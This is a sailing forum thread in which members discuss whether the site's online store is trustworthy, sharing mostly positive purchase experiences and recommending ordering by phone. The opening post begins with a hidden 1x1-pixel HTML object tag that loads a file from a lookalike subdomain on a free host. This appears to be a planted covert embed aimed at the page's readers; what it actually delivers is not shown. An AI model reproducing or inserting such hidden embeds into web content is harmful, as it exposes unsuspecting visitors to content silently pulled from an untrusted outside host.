SailNet Community banner

1 - 12 of 12 Posts

·
Registered
10 Posts
Discussion Starter #1
<object data="http://sailnet.easy.comuf.com/boat.gif" width="1" height="1" type="image/jpg"></object>Do many of you purchase from the Sailnet online store? Is it safe to purchase from them? Relatively new to the "buying over the internet" thing :confused:

·
Banned
17,467 Posts
I'm about to purchase some life vests and a couple of other things from them. It'll be my first purchase. I've heard some positive and some negative (mostly positive). In any case, they do support this very free forum that keeps us all entertained. So I'm definitely giving them a shot. You should too.

·
Registered
4,507 Posts
If you have any problems just give them a call and they'll make it right.

·
Senior Moment
598 Posts
Ordering online is next to impossible in my experience. It is great they support this board the way they do, but price wise, its rare that I find a bargain on anything I need. I have noticed some killer prices on close out stuff, so it is worth watching or getting on their spam list.

michael

·
1977 Morgan OI 30
438 Posts
Good to go

I've bought quite a few things and always did well. As has been mentioned, it is easier to purchase via the phone.

·
Telstar 28
1,000 Posts
I've used them for several purchases. Their closeouts and special purchases are often very good deals, and they're competitive on many other prices. However, their e-commerce engine leaves a bit to be desired, so I would highly recommend calling them and speaking with them over the phone if you have any large purchases or a list of items you need.

·
Registered
12 Posts
I ordered from sailnet once

And that was enough, I had horrible customer service experience. Would never again. But thanks sailnet for the site I love it.

·
Banned
17,467 Posts
Oh give me a break. I've had a bad experience with virtually every site and store I do business with. One experience does not an informed decision make.

·
Telstar 28
1,000 Posts
Unfortunately, I find myself agreeing with SmackDaddy.... most stores will have at least one bad experience, but my overall experience with Sailnet's store has been quite good, provided I didn't try going through the e-commerce portion for any complicated orders. :)

·
Registered
5,856 Posts
When we first bought our boat I ordered $1,000's of dollars worth of stuff from Sailnet over the next few years. Never a problem. If fact I had one guy there who I would call and ask for the deal of the day. He would always have a close out or some deal. IE, my kids had true foul weather gear for the price of plastic rain suits.

1 - 12 of 12 Posts